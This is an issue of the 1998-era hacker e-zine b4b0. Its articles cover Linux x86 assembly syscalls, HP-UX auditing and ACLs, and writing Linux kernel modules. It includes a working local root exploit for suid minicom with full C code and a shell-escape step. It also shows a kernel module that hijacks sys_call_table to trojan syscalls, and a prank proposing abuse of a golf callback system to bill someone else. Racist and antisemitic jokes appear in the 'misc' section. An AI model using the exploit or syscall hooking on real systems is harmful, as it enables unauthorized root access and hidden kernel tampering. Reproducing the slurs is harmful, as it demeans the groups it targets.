a simple and confusing tutorial! Wait for b4b0.4 !! By then I will have finished a REAL TEXTURE MAPPED THREE DEE GRAPHICZ ENGINE IN XLIB!$@@!@@!!@ have fun - jsbach [ asm on de Linux/x86 - chrak ]-x- -x- -x- -x- -x- -x- -x- -x--x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- asm on de Linux/x86 prerequisite: 1) you know basic x86 asm, and a bit about protected mode. 2) for this article well be using at&t synthax, simply becuase everyone will have the assembler already, and its used by gcc for all the examples here just set up a file like: int main(void) { __asm__(" example code here "); } If you dont meet the prerequisites go find the INTEL 80386 PROGRAMMER'S REFERENCE MANUAL on the web. Get the "Intel Architecture Software Developer's Manual" volumes 1 - 3 in pdf format at: ftp://download.intel.com/design/pentium/manuals/24319001.PDF vol. 1 ftp://download.intel.com/design/pentium/manuals/24319201.pdf vol. 3 To learn the gnu as asembler goto http://www.freebsd.org/info/as-all and also just play around with gcc's -S option. we can use all our code inbedded [s1c] into a gcc src file also, by using the __asm__ keyword. Although this isnt portable to other compilers. 1:syscalls 2:sys_socketcall 3:using lib functions 4:debugging 5:a full example 6:el fin 1:syscalls bleh. the syscall numbers can be found in <sys/syscall.h> most of them behave like their libc wrappers for example to fork u could do this: movl $2, %eax # 2 = SYS_fork int $0x80 # Linux the syscall used is based on the value of eax at the time the interrupt occurs, sys_fork does not have any arguments so the other general registers are ignored. The code movl $0x4647, (%ebp) # movs GF to the addr in ebp movl $4, %eax # 4 = SYS_write movl $1, %ebx # 1 = fileno(stdout) leal (%ebp), %ecx # loads the address of the 'GF' string movl $2, %edx # bytes to write int $0x80 will write "GF" to stdout, Linux takes the values in the general registers besides eax and uses them as args to the syscall. The order is the same as the write(2) lib function: write(int fd, const void *buf, size_t count) , this holds true for most (all?) lib functions. The offset field of interrupt 0x80's descriptor in the idt points to the system_call symbol in arch/i386/kernel/entry.S in the Linux src tree. This code will call the address pointed to by the 4th entry in sys_call_table (from 0). This is sys_write()'s address. The code for this function is in fs/read_write.c, It is passed the values that were in ebx, ecx, and edx when we interrupted. When the syscall returns it will set the registers back to where they were before it started the only change will be that %eax contains the return value. 2:sys_socketcall I've given this its own chapter becuase blah blah blah(i felt like it!) This works like socketcall(2) libc function. All the other functions like socket(), accept() and so on are just wrappers to socketcall() in libc. anyway. lets say I wanted to create a socket. I could do: sfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); or unsigned long args[] = { AF_INET, SOCK_STREAM, IPPROTO_IP }; sfd = socketcall(SYS_SOCKET, args); or movl $2, -12(%ebp) # 2 = AF_INET movl $1, -8(%ebp) # 1 = SOCK_STREAM movl $0, -4(%ebp) # 0 = IPPROTO_IP movl $102, %eax # 102 = SYS_socketcall movl $1, %ebx # 1 = SYS_SOCKET leal -12(%ebp), %ecx # load addr of socket args int $0x80 the socketcall call args are defined in <linux/net.h>, the args are the same as the libc functions arguments. Its similar for all other socketcall calls. Here is a SYS_CONNECT example: # equiv of a sockaddr struct movw $2, -20(%ebp) # sockaddr family = AF_INET movw $5376, -18(%ebp) # sockaddr port = 5376 = htons(21) movl $0, -16(%ebp) # sockaddr addr = 0 movl $8, -12(%ebp) # assuming 8 is a valid fd leal -20(%ebp), %eax # load addr of sockaddr struct movl %eax, -8(%ebp) movl $16, -4(%ebp) # 16 = sizeof(struct sockaddr) movl $102, %eax # 102 = SYS_socketcall movl $3, %ebx # 3 = SYS_CONNECT leal -12(%ebp), %ecx # load addr of connect args int $0x80 3:using lib functions to use a function from libc or whatever just push its args onto the stack, and call it. For example to print the string "Hello world" we could do: pushl $MSG # push addr of string onto stack call puts # call puts pushl $0 # push 0 onto stack call exit # call exit MSG: .string \"Hello world\" # null terminated string This prints out the string, and exits with 0. Multiple arguments are pushed in backwards order, because we have a lifo stack. i.e. func(1, 2, 3) would be: push 3 push 2 push 1 call func. 4:debugging ok, so your program does nothing or coredumps using strace is excellent for seeing whats going on for example, In the SYS_CONNECT example, if there was an error we would be able to find it quickly by 'strace a.out' or whatever its name was. connect(8, {sin_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("0.0.0.0" )}, 16) = -1 EBADF (Bad file number) The problem here was that 8 was not a valid fd The following example will core dump if ran in an application: hlt pushl $5 call exit This is because hlt can not be used in a segment with a CPL higher then 0. Lets assume we didn't know this and wanted to figure out why our program was 'FUK3d!'. This is condensed a bit: gdb program (gdb) run Program received signal SIGSEGV, Segmentation fault. 0x804841b in main () (gdb) x/i 0x804841b 0x804841b <main+3>: hlt Now we know where the problem is. 5:a full example /* writes host 0's ftp banner thing to stdout */ char error_msg[] = "err0r\n"; /* we can use global variables */ void main(void) { __asm__(" movl $2, -12(%ebp) # 2 = AF_INET movl $1, -8(%ebp) # 1 = SOCK_STREAM movl $0, -4(%ebp) # 0 = IPPROTO_IP movl $102, %eax # 102 = SYS_socketcall movl $1, %ebx # 1 = SYS_SOCKET leal -12(%ebp), %ecx # load addr of socket args int $0x80 cmpl $-1, %eax jl ERROR movw $2, -20(%ebp) # sockaddr family = AF_INET movw $5376, -18(%ebp) # sockaddr port = 5376 = htons(21) movl $0, -16(%ebp) # sockaddr addr = 0 movl %eax, -12(%ebp) # put sockfd leal -20(%ebp), %eax # load addr of sockaddr struct movl %eax, -8(%ebp) movl $16, -4(%ebp) # 16 = sizeof(struct sockaddr) movl $102, %eax # 102 = SYS_socketcall movl $3, %ebx # 3 = SYS_CONNECT leal -12(%ebp), %ecx # load addr of connect args int $0x80 cmpl $-1, %eax jl ERROR movl $3, %eax # 3 = SYS_read movl -12(%ebp), %ebx # get sockfd leal -80(%ebp), %ecx # buffer movl $80, %edx # 80 = count int $0x80 cmp $-1, %eax jl ERROR movl $4, %eax # 4 = SYS_write movl $1, %ebx # 1 = fileno(stdout) int $0x80 cmp $-1, %eax jl ERROR movl $0, %ebx # returns 0 on success EXIT: movl $1, %eax # 1 = SYS_exit int $0x80 ERROR: movl $4, %eax # 4 = SYS_write movl $1, %ebx # 1 = fileno(stdout) movl $error_msg, %ecx # load MSG1's addr movl $6, %edx # 6 = strlen(MSG1) int $0x80 movl $-1, %ebx # returns -1 on failure jmp EXIT "); } 6:el fin So dat about wraps it up for now ? Basically knowing this is only practical for writing exploit shellcode or implimenting a library, but your not a practical person, are you ? However it does give you an idea of how many levels the system works at. Werd 2 fatima! [b4b0 misc, w4rnings et cet3ra (ge0rge)] x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0 misc.. ----------- b4b0: with NEW cleansing action! b4b0: Just do it. b4b0 - Let the journey begin. b4b0 - don't leave home without it. b4b0 - clinically shown to actually *GROW* hair! b4b0 - 4 out of 5 doctors recommend it! (the 5th one is black) b4b0 - this box never closes! b4b0 - doesn't fade colors like other brands do! Viva la b4b0! Did someone say b4b0? Yo quiero b4b0! b4b0: the histamine blocker. Get a taste of the b4b0! b4b0: quick allergy relief. b4b0: for upset *stomachs* b4b0, will help you get your 'z's! b4b0 cookies and creme : smile more! Like a good neighbor, b4b0 is there.. Just wait till we get our b4b0 on you! b4b0 warnings / other: ---------------------- - You may need to read b4b0 daily for three months or more to see visible results. b4b0 will not regain all your eliteness. And if you stop using this product you will gradually start losing the eliteness you have gained. There is not sufficient evidence that b4b0 works for rsession at the physical level. If you have seen results after 12 mones of using b4b0 further treatment is likely to be of benefit. - Guns don't kill people. b4b0 kills people. - f.b.s. (fetal b4b0 syndrome) can cause serious birth defects to your child if you are reading b4b0 anytime during pregnancy. Such birth defects can range from mild pigeon toe'd children to serious deformities of organs, limbs, and other physical features inside the body. Please, do not read b4b0 while pregnant. - b4b0 if read in large doses can cause liver failure. - *WARNING* b4b0's contents under extreme pressure *WARNING* - WARNING! FLAMMABLE LIQUID AND VAPOR. VAPORS AND SPRAY MIST HARMFUL IF INHALED. HARFUL OR FATAL IF SWALLOWED. MAY CAUSE CENTRAL NERVOUS SYSTEM EFFECTS SUCH AS DIZZINESS, HEADACHE, NAUSEA. MAY CAUSE NOSE, THROAT, EYE AND SKIN IRRITATION. CAN BE ABSORBED THROUGH THE SKIN. - CAUTION: Keep Out Of Eyes! In case of accidental eye contact, DO NOT RUB EYES. Flush eyes throughly with water. If conditions worsen or irritation persists, call a physician. If swallowed consult a physician or poison control center. KEEP OUT OF REACH OF CHILDREN. FOR EXTERNAL USE ONLY. - WARNING: Extremely Flammable! > b4b0's 0fficial song Doggie Tom Overture; Lords Of Acid > b4b0's magazine Guns and Ammo > b4b0's official controlled substance Chelsea Clinton > b4b0's official narcotic morphine > b4b0's country afghanistan > b4b0's k-rad clothez b4b0 we4r > b4b0's suggestion go fuck yourself > The Official Food Supplier Of b4b0 burger king! > Stuff that keeps b4b0 going coffee > Stuff that keeps b4b0 going too Hustler Magazine (tm) > Official b4b0 place of worship your local synagogue! [g0lf teleph0ny ju4r3z (Qytpo) ]-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- ######################## GOLF TELEPHONY JUAREZ ########################### ## ## ### Qytpo ### ### ### ########################### 0kay. so i was house sitting for theze 0ld people in thiz el8 retirement community. and eye was sitting 0n the t01let, taking a sh1t, when i came across this article for the 0ld g0lfer k1dz in place, in a pamphlet given to members of the retiremenet community. Up0n reading it i noticed some pretty silly things. the art1cle bel0w iz a replica of the exact thing i read. l00k specifically at the portion labeled "7" begin 644 0day.g0lf.juarez ----- MACCS Tee Time System - Procedure, Rules, and Regulations ----- The 1997-98 golf season is upon us. Our computer system for taking tee times is called MACCS, which stands for Message and Call Back Computer System. The times for call in and the phone numbers for our two phase III golf courses are: OAKWOOD/IRONWOOD 7:00 to 7:10AM 602-895-1805 Due to heavy phone line usage during the hours of 6:AM to 9:00AM, any changes or cancellations in teetimes should be made only starting at 9:30 AM. 48 hours in advance by phone or in person, at each pro shop. At 9:30 AM daily, each Pro Shop will sign up "Stand By's", alternating between people in person and the telephone. The MACCS system is a fair and efficient way to take tee times and also keeps the personal touch of talking with a pro shop staff person. The system works as follows: 1: Between 4:45 PM, and 5:3 AM, golfers can call 602-895-1805 for tee times at oakwood or ironwood. MACCS will give the offical time to the second. 2: Prompty at 7:00 AM, golfers can call 602-895-1805 for tee times at Oakwood or Ironwood. MACCS wll accept 150 calls during the Oakwood/Ironwood call in period. 3: MACCS will answer your call by saying "Please enter last four digits of your phone number and end with the star key." (i.e., 6566*). MACCS will then tell you what number call you are, say "Good Bye" and hang up. Golfers should punch in their phone number without delay. It is not the order the call was recieved, but the order in which valid numbers are entered that counts. The comptuter will then automatically call you back, based on your caller number. You will make your tee time then by talking with a pro shop staff person. 4: MACCS will automatically accept and verify the sequence of 150 calls in an estimated 10 minute period for Oakwood and Ironwood. After 150 calls have been taken in, MACCS will tell golfers no more calls are being accepted at this time. *please do not call or re-dial the tee time number after that 10 minute period has passed. MACCS must have open phone lines in order to call the golfers back.* If your call did not get answered by MACCS during this 10 minute period, please call the next golf course at the appropriate time. 5: MACCS will keep trying to call you back, up to 3 minutes, when a busy signal is recieved. 6: Pulse phones are not acceptable to this MACCS system. Phones that are switchable must have the switch set to TONE. If the caller makes a mistake punching in the phone number, just press the pound(#) key and MACCS will start the procedure over again. You may substitute punching "0000" for a non-functioning star(*) key and also punching "9999" for a non-functioning pound(#) key. 7: MACCS will call you back if you are outside the 895 phone prefix area. Just punch in the correct prefix (i.e., 802-5010). If you are in an area that requires a toll call, just punch in (1-602) before your number (i.e., 1-602-248-6134). Finally, if you are in an area with a different area code than 602, just punch in all 11 digits on your phone number (i.e., 1-414-728-6001). Long distance calls will be charged back to the caller by the pro shop. Please feel free to ask your Pro Shop staff for assistance. EOF ------------------------------------------------------------------------------- 0kay so as you can see, th0u could have a bit of fun with this. enter in s0lo'z number 0ver and over and have him get billed perhapz. wh0 knowz. the possiblities are endl3ss. have fun kidz. minicom versions less than 1.81.1 have many buffer overflow bugs the one we will be exploiting is case 't': /* Terminal type */ ---> strcpy(termtype, optarg); #ifdef __linux__ /* Bug in older libc's (< 4.5.26 I think) */ if ((s = getenv("TERMCAP")) != NULL && *s != '/') unsetenv("TERMCAP"); #endif minicom ships suid root with slackware 3.5 so we will work from there. now lets see. termtype is static, so we won't be able to do the traditional buffer overflow of overwriting the return address. but could there be useful information in memory past termtype? we take a look at minicom.h and find EXTERN int real_uid; /* Real uid */ EXTERN int real_gid; /* Real gid */ EXTERN int eff_uid; /* Effective uid */ EXTERN int eff_gid; /* Effective gid */ wow. the one we want is real_uid. lets see just how far it is past termtype. we insert this in minicom.c: printf ("real_uid is at: %x\n" "termtype is at: %x\n", &real_uid,termtype); output: real_uid is at: 80664b4 termtype is at: 8066480 so real_uid is just 52 bytes past the start of termtype! we can take advantage of the fact that getopt() will keep reading the same parameter over and over (in this case, "-t"). so we feed it 4 strings, the first one ending at the last memory location of real_uid (termtype+55). this will set the last byte of real_uid to 0. we do the same for (termtype+54),(termtype+53),and (termtype+52). we also give minicom a "-t vt100" parameter so it won't exit with `no termcap entry' -- start new.minicom.c -- #include <stdio.h> #include <string.h> #include <unistd.h> #define OFFSET 52 /* if you figure this out, you could try defining it */ //#define UTTY "/dev/ttyp0" char * makestring (int ch, int len) { static char b[500]; int i; for (i=0 ; i<len ; i++) { b[i] = ch; } b[i] = 0; return b; } int main (int argc, char **argv) { char bleh[4][60]; strcpy (bleh[0],makestring(255,OFFSET+3)); strcpy (bleh[1],makestring(255,OFFSET+2)); strcpy (bleh[2],makestring(255,OFFSET+1)); strcpy (bleh[3],makestring(255,OFFSET)); #ifdef UTTY execl ("/usr/bin/minicom","minicom", "-t",bleh[0],"-t",bleh[1], "-t",bleh[2],"-t",bleh[3], "-t","vt100","-s", "-p",UTTY,NULL); #else execl ("/usr/bin/minicom","minicom", "-t",bleh[0],"-t",bleh[1], "-t",bleh[2],"-t",bleh[3], "-t","vt100", "-s",NULL); #endif return 0; } -- end new.minicom.c -- so real_uid becomes 0x00000000 (root) we can't just send minicom a SIGSTP, it will restore our old uid. we need to get minicom to *exec* a shell. execute the above code and you'll discover minicom's window system is unreadable. start a normal version of minicom in a different console we look at the menu and see: `Filenames and paths' A - Download directory : /tmp B - Upload directory : C - Script directory : D - Script program : runscript E - Kermit program : /usr/bin/kermit Change which setting? looks like we could just change `E- Kermit program' to `/bin/bash' so we do. now we exit configuration and the terminal starts up. we start kermit CTRL+A+K = bash# voila. [a high level sockets API - [presonic]] x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- [/home/presonic/projects/tcpip] $ cat README High Level Unix Socket Functions This is the first release, they have only been *tested* on linux. These functions can be used to learn how to use socket functions, or to avoid learning them. That part, has been left to you. Both subscan and http_ver are examples on how to use the socket functions. subscan uses advanced non blocking i/o and select() stuff, so it may be hard to follow. See tcpip.c for more details. Files: README you're fat. Makefile type 'make' and see. tcpip.c *the* socket functions. subscan.c a scanner that sweeps a subnet for a given port. (this uses non blocking i/o) http_ver.c this query's a web server and try's to find the server version. [/home/presonic/projects/tcpip] $ whatis b4b0 b4b0: nothing appropriate [/home/presonic/projects/tcpip] $ EOF [HP-UX security pt 2 - [tip]] x -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= HP-UX: A Security Overview, Part Two revision01 10sep98 by: tip (tip@b4b0.org) --------------------------------------------------------------------------- Table of Contents: 1) Introduction 5) The Trusted System: DB Lib Routines 2) The Trusted System: Auditing 6) Other Info Pt 1 3) The Trusted System: ACLs 7) To Be Continued --------------------------------------------------------------------------- 1) Introduction a) This text is designed to complement to general Unix knowledge. All Unix OS's are different in their own right. This text will delve into HP-UX- specific areas. This is not a Unix tutorial, rather a supplement to fundamental Unix knowledge. b) This text will cover HP-UX version 10.x primarily. Specifically, 10.10 and 10.20 will be in mind. 11.0 has been released and I haven't gotten to checking it out yet. 9.x is old, and no longer supported by HP. Thus, the most logical choice (and most popular version of HP-UX) is 10.x. c) I'm not perfect; please notify me of any errors in the document. Also, if you see anything you want added to this file, feel free to send them to me. --------------------------------------------------------------------------- 2) The Trusted System: Auditing Auditing is a feature only available on Trusted Systems. It provides a means to record events and analyze security. Monitoring is done from the command line or through SAM (Systems Administration Manager). Most commonly, SAM is used to do auditing. Auditing commands These are pretty self-explanatory. Check man pages for detailed info. audsys(1m) : start/halt auditing and set/display audit file information audusr(1m) : select user to audit audevent(1m) : change/display event/syscall status audomon(1m) : set audit file monitoring and size parameters audisp(1m) : display audit record What system calls does auditing log? Basically system calls are grouped into event types. Auditing is selective by this event type, not by particular system calls. One thing to note: the event types of admin, login, and moddac are logged by default. See below for which system calls fit under which event type. These are selectable under SAM. event type: system calls: ----------- ------------- admin audevent(1m), audisp(1m), audswitch(2), audsys(1m), audusr(1m), chfn(1), chsh(1), init(1m), passwd(1), privgrp(2), pwck(1m), reboot(2), sam(1m), setaudid(2), setaudproc(2), setdomainname(2), setevent(2), sethostid(2), settimeofday(2), swapon(2) close close(2) create creat(2), msgget(2), mknod(2), mkdir(2), pipe(2), semget(2), shmat(2), shmget(2) delete msgctl(2), rmdir(2), semctl(2) ipcclose shutdown(2) ipccreat bind(2), socket(2) ipcdgram udp(7) ipcopen accept(2), connect(2) login init(1m), login(1) modaccess chdir(2), chroot(2), link(2), newgrp(1), rename(2), setgid(2), setgroups(2), setresuid(2), setuid(2), shmctl(2), shmdt(2), unlink(2) maddoc chmod(2), chown(2), fchmod(2), fchown(2), fsetacl(2), setacl(2), umask(2) open execv(2), execve(2), ftruncate(2), lpsched(1m), open(2), ptrace(2), truncate(2) process exit(2), fork(2), kill(2), vfork(2) removable smount(2), umount(2), vfsmount(2) uevent1 reserved for custom self-auditing programs uevent2 reserved for custom self-auditing programs So what is a self-auditing program? Basically, the amount of data that is audited can become cumbersome; thus self-auditing programs log only one entry decribing their process, after suspending the auditing of their actions. The intent is to limit and thus, optimize the audit data that is logged. Standard processes that are self-audit capable: audevent(1m), audisp(1m), audsys(1m), audusr(1m), chfn(1), chsh(1), init(1m), login(1), lpsched(1m), newgrp(1), passwd(1), pwck(1m). Where are audit logs located? /.secure/etc/audfile1 (primary log) switch size = 5 megs (AFS) /.secure/etc/audfile2 (auxiliary log) switch size = 1 meg (AFS) Warnings are sent when the log file reaches 90%. The Audit File Switch (AFS, as seen above), is basically a defined limit for the primary log file. The File Space Switch (FFS), is the defined limit for the filesystem for which the audit logs reside on. When the AFS limit is reached for the primary log, the audit logs are stopped, and then started on the auxiliary log. If no auxiliary log exists, it keeps on continuing to log on the primary. Now, if both the AFS and FFS limits are reached, it _still_ continues to log. Obviously this will be logged that the limit has been reached. But when does it stop? Basically a system parameter in the kernel, called min_free, stops all audit log activity if that point is reached. Thus, in a nutshell... -----------------> as size of audit logs increase --------------------> primary AFS reached, give warning, switch to: auxiliary log -> when auxiliary AFS is is reached, give warning, and: watch FFS -> when that limit is reached, give warning, and: watch min_free parameter -> when that limit is reached, halt all audit logs, until they are removed --------------------------------------------------------------------------- 3) The Trusted System: ACLs Access control lists are are basically an "extended" set of permissions for files and directories. Two things to note: 1) ACLs are slowly being phased out (11.0 supports them, but this might be the last version that supports ACLs), and 2) ACLs cannot be used on VxFS (Journal Filesystem, also known as JFS). Two commands are integral to ACLs: lsacl and chacl. Basically think of lsacl as the extended equivalent of ls, while chacl is the extended equivalent of chmod and chown. How are ACLs "extended"? While standard Unix has three sets of permissions, ie: -rwxr--r-- 1 oracle dba 523 Nov 22 1996 run1.sh ACLs enables thirteen additional sets of permissions (ACL entries) to be designated, which are stored in the access control list of the file. Suppose you wanted everyone BUT johndoe to read a file. In standard Unix, you'd have to create a group, put everyone in it except johndoe, then modify the permissions on the file accordingly (basically a pain in the ass). With ACLs, simply type: chacl 'johndoe.users=-rwx' <filename> Looking at that file with 'lsacl <filename>' you see: (johndoe.users,---)(root.%,rw-)(%.sys,r--)(%.%,r--) filename Note that modifiers in chacl are + (add permission), - (remove permis- sion), etc. How would you know if a file or directory had additional permissions? Do an 'ls -l' or 'll' on the file: -rwxr--r-+ 1 oracle dba 523 Nov 22 1996 run1.sh Note the "+". This indicates there are additional permissions to be seen with lsacl. ACLs are useful to know within HP-UX, as standard file permissions, listings in /etc/group, etc. can be inconclusive in determining the owner- ship of a file or directory. Other commands (primarily system calls; see man pages for more info): getaccess (command): list access rights to a file. chmod -A (command): the -A option preserves ACLs associated with the file. otherwise, they are deleted. cpset (command): install object files in binary directories. does not set a file's optional ACL entries. find -acl (command): the -acl option supports ACLs. getacl/fgetacl (syscall): get ACL information. setacl/fsetacl (syscall): set ACL information. cpacl/fcpacl (syscall): copy ACL/mode bits from one file to another. setaclentry/fsetaclentry (syscall): set/modify/delete one ACL entry in a file. chownacl (syscall): change ACL owner/group info in a file. acltostr (syscall): convert ACL structure to string form. strtoacl (syscall): convert string form to ACL structure. strtoaclpatt (syscall): parse/convert ACL pattern strings to arrays. --------------------------------------------------------------------------- 4) The Trusted System: DB Lib Routines Basically, these routines are used to manipulate information on both the password file (/etc/passwd), and the trusted system database (/tcb/files/ auth). getdvagent(3): get device entry from /tcb/files/auth/devassign getprdfent(3): get system default entry from /tcb/files/auth/system/default getprtent(3) : get term control entry from /tcb/files/ttys getprpwent(3): get /tcb/files/auth password entries getpwent(3c) : get /etc/passwd entries getspwent(3x): get /tcb/files/auth password entries for standard, non-hp format putprpwnam(3): put password entry in /tcb/files/auth putpwent(3c) : put password entry in /etc/passwd putspwent(3x): put password entry in standard, non-hp format --------------------------------------------------------------------------- 5) Other Info Pt 1 nettl: HP-UX's network sniffer The question arises all too often about the availability of a sniffer for HP-UX. A solution that isn't realized by many is the fact that HP-UX comes with one. Here is the basic syntax for nettl. Check the man page for more detailed information on what you need. Start the logging process, logging all (-e, short for -entity) protocol layers/software modules, outputting to /tmp/b4b0!! (pduin is the inbound protocol data unit, and obviously, pduout is the outbound protocol data unit): nettl -traceon pduin pduout -e all -f /tmp/b4b0 Stop the logging for all (-e): nettl -traceoff -e all Format the log file to make it readable: netfmt -f /tmp/b4b0.TRC0 > /tmp/b4b0.txt --------------------------------------------------------------------------- 6) To Be Continued Welps, that's it for now, kinda short. However, Part 3 will delve into NFS diskless clusters, network services, linklevel access, and other fun stuff. --------------------------------------------------------------------------- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [writing lkm's - [segv]] x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- Introduction -------------> In the past various people have released articles or trojan code for the purpose of trojanning Linux kernel's, due to the fact that it is pretty much child's play. This is a simple article which will discuss them.. and write some simple ones. When you call a syscall the 'magic number' (found in /usr/include/ sys/syscall.h) is pushed into a register along with arguments to the syscall and Linux's maskable interrupt is executed, jumping to kernel mode. Linux's maskable interrupt jumps to kernel mode and gives control to a kernel function called _system_call(), which checks the value of one the general purpose registers (eax) and compares that value to the global syscall table. The global syscall table tells where u can find the syscall in memory. simple example of calling setuid(0); Note: unless your root the call to setuid will fail.. if you are.. the execution of this program will run as root doing nothing. (just an example) root@ux~# grep "SYS_setuid" /usr/include/sys/syscall.h #define SYS_setuid 23 root@ux~# cat > setuid.c void main() { __asm__(" movl $23, %eax # magic number of syscall into eax movl $0, %ebx # arugment u are passing to setuid() int $0x80 # jump to kernel mode. "); } ^D root@ux~# Pretty simple, eh? ;) Now lets write our first loadable kernel module. (which can be loaded into the kernel on an as need basis). When you first load the module into the kernel init_module() is exec'ed, when you unload it, cleanup_module() is exec'ed. Note: printk() is a kernel function and can't be called from the userland. You should take a look at the man pages for rmmod(1), lsmod(1), and insmod(1). root@ux~# cat > lkm1.c #define MODULE #include <linux/module.h> int init_module(void) { printk("B4B0 0WNZ U.\n"); printk("Module loaded.\n\n"); return(0); } void cleanup_module(void) { printk("Module unloaded\n"); } ^D root@ux~# cc -c lkm1.c root@ux~# insmod lkm1.o B4B0 0WNZ U. Module loaded. root@ux~# rmmod lkm1.o Module unloaded root@ux~# Ok.. once _system_call() is called and finds out where the syscall we wanna exec is in memory, the actual syscall gets executed.. once that is done control is givin back to _system_call() which then call's _ret_from_sys_call() which jumps back to userland mode. Trojanning syscall's. ---------------------> Just to give you an idea. You can modify the memory address sys_call_table[SYS_<whatevercallyouwant>] points to and have it exec your code. I wrote a simple wrapper to write(2), which from the trojanned function calls the real function, just an other example.. ***IMPORTANT*** I tested this code on 2.0.33, worked fine.. Since then I have upgraded to 2.0.34 and this crashed my Linsux machine. (I'm considering downgrading ;) Oh well.. USE AT YOUR OWN RISK. I wrote this code a while ago, heh. Thanks -------> Plaguez great article in Phrack.. which pretty much explained everything. "Writing Device Drivers for Linux". Some book, forgot the name of the author. /* * gcc -O3 -c stupid-example.c; /sbin/insmod stupid-example.o * -segv <segv@b4b0.org> */ #define MODULE #define __KERNEL__ #include <linux/config.h> #ifdef MODULE #include <linux/module.h> #include <linux/version.h> #else #define MOD_INC_USE_COUNT #define MOD_DEC_USE_COUNT #endif #include <linux/types.h> #include <linux/fs.h> #include <linux/mm.h> #include <linux/errno.h> #include <asm/segment.h> #include <sys/syscall.h> #include <linux/dirent.h> #include <asm/unistd.h> #include <sys/types.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <ctype.h> int errno; extern void *sys_call_table[]; // ssize_t write(int fd, const void *buf, size_t count); ssize_t (*wwrite) (int fd, const void *buf, size_t count); // function pointer ssize_t hihi(int fd, const void *buf, size_t count) // our c0de. { ssize_t yo; yo=wwrite(fd,buf,count); // wwrite is the real write(2) call return(yo); } int init_module(void) { wwrite=sys_call_table[SYS_write]; /* have our function pointer point * to the mem addr of write. */ sys_call_table[SYS_write]=(void *)hihi; /* replace it with our return 0; * new addr to our code */ } void cleanup_module(void) { sys_call_table[SYS_write]=(void *)wwrite; /* have it point back to * orignal addr. */ } [compiled d0x on sparc asm (various)] - -x- -x- -x- -x- -x- -x- -x- -x- b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b Included in the .tgz is the directory sparc_asm/. The *class*.html files were taken from some colleges web site =) greetz to the professor who wrote them... The other thing is info on the sparc stack... reading both these things will gib u a working knowledge of sparc asm ! there is no excuse not to read all these filez right now ! b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b ************************************************************************** ************************************************************************** ************************************************************************** THATS ALL THANK U FOR READING B4B0 !!!!!!!!!!!!!!!!!!!!!!!!!! PLEASE COME AGAIN